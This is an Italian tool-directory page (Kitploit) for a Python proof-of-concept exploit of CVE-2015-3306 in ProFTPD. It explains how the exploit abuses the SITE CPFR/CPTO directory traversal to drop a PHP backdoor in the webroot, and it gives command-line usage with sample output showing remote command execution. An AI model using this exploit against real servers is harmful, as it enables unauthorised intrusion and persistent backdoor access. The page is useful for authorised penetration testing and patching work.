Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2015-3306 — Exploit PoC Python per la vulnerabilità di directory traversal CVE-2015-3306 in ProFTPD. Copia file e inserisce un backdoor PHP nella webroot per esecuzione remota di comandi tramite comandi FTP SITE CPFR/CPTO. | Kitploit
Strumenti/GitHubGitHub/donmedfor/cve-2015-3306
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubdonmedfor/cve-2015-3306

CVE-2015-3306

Exploit PoC Python per la vulnerabilità di directory traversal CVE-2015-3306 in ProFTPD. Copia file e inserisce un backdoor PHP nella webroot per esecuzione remota di comandi tramite comandi FTP SITE CPFR/CPTO.

Vedi Repository
31 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2015-3306 Exploit ProFTPD

Questo repository contiene un exploit proof-of-concept (PoC) in Python per CVE-2015-3306

⚠️ Avviso: Utilizza questo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. Lo sfruttamento non autorizzato è illegale.


Autore

Mohamed EL-KHAROUATI


Parte 1: CVE-2015-3306 Exploit ProFTPD

Descrizione

CVE-2015-3306 è una vulnerabilità di directory traversal in ProFTPD 1.3.5b e versioni precedenti. Questo exploit permette di copiare file arbitrari e di inserire una backdoor PHP nella webroot. La backdoor può eseguire comandi shell arbitrari.

Caratteristiche

  • Sfrutta la vulnerabilità di directory traversal tramite i comandi FTP SITE CPFR/CPTO.
  • Inserisce una backdoor PHP (backdoor.php) nella webroot specificata.
  • Esegue comandi shell arbitrari tramite la backdoor.
  • Supporta comandi personalizzati tramite --rcommand.
  • Requisiti

    • Python 3.x
    • Libreria requests (pip install requests)

    Utilizzo, Output e Pulizia (Blocco di codice singolo)

    root@kitploit:~
    # Run the exploit
    python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>
    
    # Example:
    python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami
    
    # Expected Output:
    [+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
    [+] Exploiting <target_ip> 
    [+] Running Command whoami
    [+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
    [+] Running whoami: www-data
    [+] Done
    
    Scarica lo strumento